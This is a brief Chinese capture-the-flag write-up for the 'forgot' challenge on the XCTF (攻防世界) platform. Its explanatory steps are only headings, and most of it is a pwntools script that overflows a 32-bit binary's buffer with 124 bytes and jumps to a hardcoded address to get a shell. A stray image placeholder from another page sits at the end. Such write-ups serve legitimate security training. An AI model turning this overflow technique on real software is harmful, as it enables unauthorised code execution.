那段時間反編譯工具用到起飛,現在連指令都忘光了
攻防世界進階區--forgot
前言,這題中看不中用啊寶友!!!
1.檢視保護
第一反應就是蠻簡單的,32位.
2.擷取資訊(先運作程式看看)
3.ida
from pwn import*
p=process('./forgot')
system_add=0x80486cc
payload1='a'*124+p32(system_add)
p.recvuntil("> ")
p.sendline("baba")
p.recvuntil("> ")
p.sendline(payload1)
p.interactive()
![軟體測試作業2[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)